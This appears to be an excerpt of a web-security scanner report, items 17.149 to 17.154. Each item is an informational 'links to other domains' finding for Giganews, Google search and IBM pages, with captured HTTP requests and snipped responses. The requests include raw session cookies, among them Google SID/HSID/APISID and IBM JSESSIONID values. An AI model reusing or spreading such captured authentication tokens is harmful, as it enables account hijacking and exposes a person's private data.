Date: Fri, 16 Sep 2011 19:31:15 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:31:15 GMT
Set-Cookie: engine_keywords=google%3Bnntp%20server; domain=.giganews.com; path=/
Vary: Accept-Encoding
Content-Length: 22201

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<meta name="msvalidate.01" content="ED817B8F83430B434BF3FF0CD3ABCB84" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<li><a id="twitter-link" class="social-link outbound" href="http://www.twitter.com/giganews">Giganews Twitter</a>
...[SNIP]...
<li><a id="facebook-link" class="social-link outbound" href="http://www.facebook.com/giganews">Giganews Facebook</a>
...[SNIP]...
<li class="facebook"><a class="outbound" href="http://www.facebook.com/giganews">Giganews Facebook</a>
...[SNIP]...
<li class="twitter"><a class="outbound" href="http://www.twitter.com/giganews">Giganews Twitter</a>
...[SNIP]...
<li class="youtube"><a class="outbound" href="http://www.youtube.com/giganews">Giganews YouTube</a>
...[SNIP]...
<li class="linkedin"><a class="outbound" href="http://www.linkedin.com/company/giganews">Giganews LinkedIn</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1071743629/?label=M2hACKrj4gEQjYWG_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

17.149. https://www.giganews.com/signup/billing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.giganews.com
Path:   /signup/billing.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /signup/billing.html?si=1&signupkey=1316201533-53313887a-x&edit=1&account=PERS-SILVER-A HTTP/1.1
Host: www.giganews.com
Connection: keep-alive
Referer: https://www.giganews.com/signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: location=EUR; paid_keywords=google%3Bnntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; paid_redirect=nntp_variations%20GN-EN-S-ZZ-bc-nntp_server-exact; engine_keywords=google%3Bnntp%20server; __utma=176644346.1185559513.1316219532.1316219532.1316219532.1; __utmb=176644346.1.10.1316219532; __utmc=176644346; __utmz=176644346.1316219532.1.1.utmgclid=CMbM1MnAoqsCFQNggwod4mqsoA|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=nntp%20server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:37:24 GMT
Server: Apache/2.0.54 (Fedora)
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Fri, 16 Sep 2011 19:37:24 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 43234

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xml:lang="en" lang="en">
<head>
<title>U
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1071743629/?label=K_3-CKqFiAIQjYWG_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

17.150. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=virtual+desktop HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:23:23 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 131435

<!doctype html> <head> <title>virtual desktop - Google Search</title> <script>window.google={kEI:"e-hzTu6UEazYiAKVrZS0Ag",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("e
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=virtual+desktop&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Virtual_desktop" class=l onmousedown="return clk(this,this.href,'','','','1','','0CHUQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Q632fh5gSp4J:en.wikipedia.org/wiki/Virtual_desktop+virtual+desktop&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CHgQIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://en.wikipedia.org/wiki/Virtual_desktop#Overview" onmousedown="return clk(this,this.href,'','','','1','','0CHoQ0gIoADAA')">Overview</a> - <a href="http://en.wikipedia.org/wiki/Virtual_desktop#Implementation" onmousedown="return clk(this,this.href,'','','','1','','0CHsQ0gIoATAA')">Implementation</a> - <a href="http://en.wikipedia.org/wiki/Virtual_desktop#See_also" onmousedown="return clk(this,this.href,'','','','1','','0CHwQ0gIoAjAA')">See also</a> - <a href="http://en.wikipedia.org/wiki/Virtual_desktop#References" onmousedown="return clk(this,this.href,'','','','1','','0CH0Q0gIoAzAA')">References</a>
...[SNIP]...
<h3 class="r"><a href="http://www.vmware.com/products/view/overview.html" class=l onmousedown="return clk(this,this.href,'','','','2','','0CIIBEBYwAQ')">VMware View (VMware VDI) Enterprise <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:M7cqBerHx3cJ:www.vmware.com/products/view/overview.html+virtual+desktop&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CIgBECAwAQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://virtuawin.sourceforge.net/" class=l onmousedown="return clk(this,this.href,'','','','3','','0CI0BEBYwAg')">VirtuaWin - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Ony67iO3jbIJ:virtuawin.sourceforge.net/+virtual+desktop&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CJABECAwAg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.citrix.com/virtualization/virtual-desktop.html" class=l onmousedown="return clk(this,this.href,'','','','4','','0CJUBEBYwAw')">Citrix Systems .. Desktop virtualization, <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:8UHOCwX26JkJ:www.citrix.com/virtualization/virtual-desktop.html+virtual+desktop&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CJgBECAwAw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://lifehacker.com/5358291/five-best-virtual+desktop-managers" class=l onmousedown="return clk(this,this.href,'','','','5','','0CJ0BEBYwBA')">Five Best <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:pjtAy9GA200J:lifehacker.com/5358291/five-best-virtual%2Bdesktop-managers+virtual+desktop&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:pjtAy9GA200J:lifehacker.com/5358291/five-best-virtual%2Bdesktop-managers+virtual+desktop&cd=5&hl=en&ct=clnk&gl=us','','','','5','','0CKABECAwBA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://support.emory.org/vdt/default.htm" class=l onmousedown="return clk(this,this.href,'','','','6','','0CKQBEBYwBQ')">Emory Healthcare <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:WH5XrQlxzoUJ:support.emory.org/vdt/default.htm+virtual+desktop&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CKcBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://searchvirtualdesktop.techtarget.com/definition/virtual-desktop" class=l onmousedown="return clk(this,this.href,'','','','7','','0CKwBEBYwBg')">What is <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:8Nay5duUYboJ:searchvirtualdesktop.techtarget.com/definition/virtual-desktop+virtual+desktop&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CK8BECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://helpdesk.its.uiowa.edu/virtualdesktop/default.htm" class=l onmousedown="return clk(this,this.href,'','','','8','','0CLQBEBYwBw')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:beGd2DepZIoJ:helpdesk.its.uiowa.edu/virtualdesktop/default.htm+virtual+desktop&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CLcBECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://vdm.codeplex.com/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CLwBEBYwCA')">Finestra <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:YaANy3ekCV4J:vdm.codeplex.com/+virtual+desktop&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CL8BECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.codetek.com/ctvd/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CMQBEBYwCQ')">CodeTek <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Xd0pq95LrRIJ:www.codetek.com/ctvd/+virtual+desktop&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CMcBECAwCQ')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://www.zdnet.com/blog/small-business-matters/pano-pre-configures-virtual-desktop-solution-for-smbs/279" class=l onmousedown="return clk(this,this.href,'','','','11','','0CMsBEKkCMAo')">Pano pre-configures <em>
...[SNIP]...
<span class=tl><a href="http://blog.chron.com/techblog/2011/09/netflix-plug-ins-and-virtually-crippled-on-windows-8/" class=l onmousedown="return clk(this,this.href,'','','','12','','0CNEBEKkCMAs')">Netflix, plug-ins and virtually crippled on Windows 8</a>
...[SNIP]...
<span class=tl><a href="http://www.zdnet.com/blog/virtualization/the-numbers-are-in-on-the-move-to-virtualization/3772" class=l onmousedown="return clk(this,this.href,'','','','13','','0CNcBEKkCMAw')">The numbers are in on the move to virtualization</a>
...[SNIP]...

17.151. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=nntp+server HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; HSID=AbppJa1_E7iMausjK; APISID=qfB18aLM4wkSRyYX/Aqw8quAKRHd7UuSmT; NID=51=sK4D6Ekqiq5x2aIbfG65p0N2bY_ck2S7XMaUrDs_B5DJ1iJfkQNtuQI8wOg2lKG4sBjrjWXSg7pA0iwTqjrJ-gxxWdfY8fs1gpCmxlTKp0PssKiWQtHPYPS35cLQE0Df; SID=DQAAAO8AAAD7Xl0oDS_3Xy0JKwYeKgRjLggJuPZagSb_-dzKijS1WNMY9j-KLCCbIkdL5gFUKxj425Av1q5M48IS5j1lYOObs1zt7iBSUPDIs8jDHA7BNSVBwNR2nv_wfJPRoa5UYs7rUEP3-cdk3lbIVVG7eniEMusm6ux7K_9KyH7qPXchvacU1HerezJNMU_4wP5jYYqqnYQQmTLUmsqdiiIkvWpvD7gxzfPW2Y7ijG9aRGGBnwWnoSSqmkJqo5RS7cgEFhp_Lzt2RC_Uv98s0HAymWMstKwJjU4OCemwWpmfSMU83cZ-hazCj5scCqbY8o2nlC4

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/sXoKgwNA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 117068

<!doctype html> <head> <title>nntp server - Google Search</title> <script>window.google={kEI:"-aNzTtndCJDKiAKTz9izAg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttribute("eid")
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=nntp+server&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.teranews.com/" class=l onmousedown="return clk(this,this.href,'','','','1','','0CEwQFjAA')">Tera News: Free uncensored <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:E-KCa-yARyIJ:www.teranews.com/+nntp+server&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CE8QIDAA')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.teranews.com/manageaccount.html" onmousedown="return clk(this,this.href,'','','','1','','0CFEQ0gIoADAA')">Manage Account</a> - <a href="http://www.teranews.com/serverlist.html" onmousedown="return clk(this,this.href,'','','','1','','0CFIQ0gIoATAA')">News Server List</a> - <a href="http://www.teranews.com/free.html" onmousedown="return clk(this,this.href,'','','','1','','0CFMQ0gIoAjAA')">Free uncensored NNTP news server</a>
...[SNIP]...
<h3 class="r"><a href="http://www.elfqrin.com/hacklab/pages/nntpserv.php" class=l onmousedown="return clk(this,this.href,'','','','2','','0CFgQFjAB')">www.ElfQrin.com - List of open <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:GRnyoz6_W_AJ:www.elfqrin.com/hacklab/pages/nntpserv.php+nntp+server&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CFsQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.w3.org/LineMode/User/AboutNewsServers.html" class=l onmousedown="return clk(this,this.href,'','','','3','','0CGAQFjAC')">How News <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:lipGZH9UbNkJ:www.w3.org/LineMode/User/AboutNewsServers.html+nntp+server&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CGMQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.disenter.com/" class=l onmousedown="return clk(this,this.href,'','','','4','','0CGgQFjAD')">Free Usenet News <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:mCsBNbuRyxEJ:www.disenter.com/+nntp+server&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CGsQIDAD')">Cached</a>
...[SNIP]...
<div class=osl><a href="http://www.disenter.com/index.php?sort=speed&amp;order=DESC" onmousedown="return clk(this,this.href,'','','','4','','0CG0Q0gIoADAD')">Speed</a> - <a href="http://www.disenter.com/index.php?sort=groups&amp;order=ASC" onmousedown="return clk(this,this.href,'','','','4','','0CG4Q0gIoATAD')">Groups</a> - <a href="http://www.disenter.com/index.php?sort=server&amp;order=DESC" onmousedown="return clk(this,this.href,'','','','4','','0CG8Q0gIoAjAD')">Server</a> - <a href="http://www.disenter.com/index.php?sort=persent&amp;order=DESC" onmousedown="return clk(this,this.href,'','','','4','','0CHAQ0gIoAzAD')">OPEN</a>
...[SNIP]...
<h3 class="r"><a href="http://www.newzbot.com/" class=l onmousedown="return clk(this,this.href,'','','','5','','0CHUQFjAE')">newzbot! public USENET resources for the masses</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:PA6FYmZBXqoJ:www.newzbot.com/+nntp+server&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CHgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nntpserver.com/" class=l onmousedown="return clk(this,this.href,'','','','6','','0CH0QFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.dmoz.org/Computers/Usenet/Public_News_Servers/" class=l onmousedown="return clk(this,this.href,'','','','7','','0CIEBEBYwBg')">Open Directory - Computers: Usenet: Public News <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:U77mXLUzdNcJ:www.dmoz.org/Computers/Usenet/Public_News_Servers/+nntp+server&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CIUBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/iis/58a23f17-5680-4d02-893e-2e0bf70e43ad.mspx" class=l onmousedown="return clk(this,this.href,'','','','8','','0CIoBEBYwBw')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:2ZvonOlb7R0J:www.microsoft.com/technet/prodtechnol/windowsserver2003/library/iis/58a23f17-5680-4d02-893e-2e0bf70e43ad.mspx+nntp+server&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','8','','0CJABECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://leafnode.sourceforge.net/" class=l onmousedown="return clk(this,this.href,'','','','9','','0CJUBEBYwCA')">Leafnode, an easy to use <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:8fByEZWTN8YJ:leafnode.sourceforge.net/+nntp+server&amp;cd=9&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CJgBECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Network_News_Transfer_Protocol" class=l onmousedown="return clk(this,this.href,'','','','10','','0CJ0BEBYwCQ')">Network News Transfer Protocol - Wikipedia, the free encyclopedia</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:r2JJIlaZoUUJ:en.wikipedia.org/wiki/Network_News_Transfer_Protocol+nntp+server&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CKABECAwCQ')">Cached</a>
...[SNIP]...

17.152. http://www.ibm.com/Search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /Search/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Search/?q=xss&v=16&lang=en&cc=us&en=utf&Search=Search HTTP/1.1
Host: www.ibm.com
Proxy-Connection: keep-alive
Referer: http://www.vm.ibm.com/search/search.cgi?WORDS=xss&HOW=AND&FILTER=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=jV0H8GMq55X-XKTuBBF; conxnsCookie=en; ibmSurvey=1316220233336; pSite=http%3A//www.vm.ibm.com/search/search.cgi%3FWORDS%3Dxss%26HOW%3DAND%26FILTER%3D

Response

HTTP/1.1 302 Found
Date: Fri, 16 Sep 2011 19:51:04 GMT
Server: IBM_HTTP_Server
Last-modified: Fri Sep 16 19:51:04 2011
Vary: User-Agent
Location: http://www.ibm.com/search/csass/search?sn=mh&q=xss&lang=en&cc=us&en=utf
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18432

Status: 200 OK
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...
cra.org/ratingsv02.html" l gen true r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true r (n 0 s 0 v 0 l 0) "http://www.classify.org/safesurf/" l gen true r (SS~~000 1))' />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico"/>
...[SNIP]...
<h2><a href="http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllThreadedWeb/d60eb7333b6a195e852575f40003b986?OpenDocument" class="ibm-feature-link">xss vulnerabilities</a>
...[SNIP]...
<br />URL:&nbsp;<a href="http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllThreadedWeb/d60eb7333b6a195e852575f40003b986?OpenDocument">http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllThr...</a>
...[SNIP]...
<h2><a href="http://www-10.lotus.com/ldd/lqwiki.nsf/dx/Protecting_against_crosssite_scripting_XSS_attacks_and_additional_security_settings_qd85" class="ibm-feature-link">Protecting against cross-site scripting (XSS) attacks and additional security...</a>
...[SNIP]...
<br />URL:&nbsp;<a href="http://www-10.lotus.com/ldd/lqwiki.nsf/dx/Protecting_against_crosssite_scripting_XSS_attacks_and_additional_security_settings_qd85">http://www-10.lotus.com/ldd/lqwiki.nsf/dx/Protecting...</a>
...[SNIP]...
<h2><a href="http://www-10.lotus.com/ldd/lqwiki.nsf/dx/Protecting_against_crosssite_scripting_XSS_attacks_and_additional_security_settings_qd851" class="ibm-feature-link">Protecting against cross-site scripting (XSS) attacks and additional security...</a>
...[SNIP]...
<br />URL:&nbsp;<a href="http://www-10.lotus.com/ldd/lqwiki.nsf/dx/Protecting_against_crosssite_scripting_XSS_attacks_and_additional_security_settings_qd851">http://www-10.lotus.com/ldd/lqwiki.nsf/dx/Protecting...</a>
...[SNIP]...

17.153. http://www.ibm.com/developerworks/forums/thread.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/forums/thread.jspa

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /developerworks/forums/thread.jspa?messageID=14644760 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/search/csass/search/?sn=dw&lang=en&cc=US&en=utf&hpp=20&dws=dw&q=xss&Search=Search
Cookie: JSESSIONID=0000mfhqCKD84k-6BQ8KZJG0e-9:119nuofa6; ibmSurvey=1316220781236; pSite=http%3A//www.redbooks.ibm.com/cgi-bin/searchsite.cgi%3Fquery%3Dxss; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:56:00 GMT
Server: IBM_HTTP_Server/6.0.2.43 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 58084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link rel="schema.DC" href="http://purl.org/DC/elements/1.0/"/>
<link rel="SHORTCUT ICON" href="http://www.ibm.com/favicon.ico"/>
...[SNIP]...
<meta name="IBM.PageAttributes" content="sid=109,100"/>


<script language="JavaScript" src="//dw1.s81c.com/www.ibm.com/developerworks/js/showinterest.js" type="text/javascript">//</script>
...[SNIP]...
<label for="q"><img alt="Search developerWorks:" height="1" width="1" src="//dw1.s81c.com/i/c.gif" /></label>
...[SNIP]...

17.154. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ibm.com
Path:   /developerworks/niagara/jsp/AuthValid.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /developerworks/niagara/jsp/AuthValid.jsp?rn=0.3916404276875721 HTTP/1.1
Host: www.ibm.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.ibm.com/developerworks/forums/thread.jspa?messageID=14644760
Cookie: ibmSurvey=1316220781236; pSite=http%3A//www.ibm.com/developerworks/forums/thread.jspa%3FmessageID%3D14644760; UnicaNIODID=oNxUBOiFZhX-XKsQQhu; SESSION_ibm_search=0001j3sYasrksnFK9PMxmyWhgQF:-1478IK; JSESSIONID=0000BvNLyPzxNajEfgFdmrEFjxa:12too2opq; mbox=check#true#1316221073|session#1316221012167-554408#1316222873|PC#1316221012167-554408.19#1317430615

Response

HTTP/1.1 404 Not Found
Date: Fri, 16 Sep 2011 19:56:10 GMT
Server: IBM_HTTP_Server/6.1.0.35 Apache/2.0.47 (Unix) DAV/2
Via: HTTP/1.1 wwwprdw.southbury-swe.ibm.com (IBM-PROXY-WTE)
Vary: Accept-Encoding
